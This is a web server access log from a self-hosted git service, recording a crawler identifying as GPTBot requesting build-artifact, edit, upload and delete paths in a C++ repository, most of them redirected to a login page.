+[17/Feb/2026:18:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9883] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9889] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:46:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:46:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11343] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9901] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 40257] [Gzip 13.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10124] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13931] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10133] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:46:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] 